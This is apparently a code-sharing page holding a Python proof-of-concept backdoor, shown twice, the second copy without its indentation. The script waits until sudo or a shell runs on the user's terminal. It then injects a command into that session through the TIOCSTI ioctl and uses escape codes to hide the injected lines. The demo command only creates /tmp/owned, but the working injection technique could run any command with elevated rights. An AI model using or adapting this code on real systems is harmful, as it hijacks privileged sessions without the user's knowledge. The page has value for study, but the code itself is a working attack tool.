bahorn · May 3, 2024 21:23
diff --git a/badbackground.py b/badbackground.py
 #!/usr/bin/env python3
 """
 So... I got nerd snipped by someone talking about a fake bug.

 But in the process I got to learn a bit about an old trick and convert it into
 a mildly interesting backdoor that lets you misuse a sudo session if started
 from one the basic user you owned.

 Run like:
    python3 this.py &
    
 Then run `sh` and the command will be injected into it.

 I implemented some broken line removal, you can do a better job.

 This is NOT a security issue, we ain't breaking any real security boundaries.
 Do not claim it as one.

 - bah
 """
 import time
 import os
 import psutil
 import fcntl
 import termios


 WANT_TO_HIJACK = ['sudo', 'sh']
 COMMAND = '\ntouch /tmp/owned\n'


 def is_priv_process_running():
    our_pty = [os.ttyname(0), os.ttyname(1), os.ttyname(2)]
    for process in psutil.process_iter():
        if process.name() not in WANT_TO_HIJACK:
            continue
        if process.terminal() not in our_pty:
            continue
        return process.terminal()

    return None


 def send_command(fd, command):
    for c in command:
        fcntl.ioctl(fd, termios.TIOCSTI, c)


 def try_hijack(pty):
    fd = os.open(pty, os.O_RDWR)
    send_command(fd, COMMAND)
    print('\033[2A\n' + ' ' * 32)


 def main():
    # hiding the deletion, has some annoying side effects
    print('\033[2A\n' + ' ' * 32)
    send_command(0, '\n')
    while True:
        pty = is_priv_process_running()
        if pty:
            try_hijack(pty)
            time.sleep(10)
            break
        time.sleep(1)


 if __name__ == "__main__":
    main()
	#!/usr/bin/env python3
	"""
	So... I got nerd snipped by someone talking about a fake bug.

	But in the process I got to learn a bit about an old trick and convert it into
	a mildly interesting backdoor that lets you misuse a sudo session if started
	from one the basic user you owned.

	Run like:
	python3 this.py &

	Then run `sh` and the command will be injected into it.

	I implemented some broken line removal, you can do a better job.

	This is NOT a security issue, we ain't breaking any real security boundaries.
	Do not claim it as one.

	- bah
	"""
	import time
	import os
	import psutil
	import fcntl
	import termios


	WANT_TO_HIJACK = ['sudo', 'sh']
	COMMAND = '\ntouch /tmp/owned\n'


	def is_priv_process_running():
	our_pty = [os.ttyname(0), os.ttyname(1), os.ttyname(2)]
	for process in psutil.process_iter():
	if process.name() not in WANT_TO_HIJACK:
	continue
	if process.terminal() not in our_pty:
	continue
	return process.terminal()

	return None


	def send_command(fd, command):
	for c in command:
	fcntl.ioctl(fd, termios.TIOCSTI, c)


	def try_hijack(pty):
	fd = os.open(pty, os.O_RDWR)
	send_command(fd, COMMAND)
	print('\033[2A\n' + ' ' * 32)


	def main():
	# hiding the deletion, has some annoying side effects
	print('\033[2A\n' + ' ' * 32)
	send_command(0, '\n')
	while True:
	pty = is_priv_process_running()
	if pty:
	try_hijack(pty)
	time.sleep(10)
	break
	time.sleep(1)


	if __name__ == "__main__":
	main()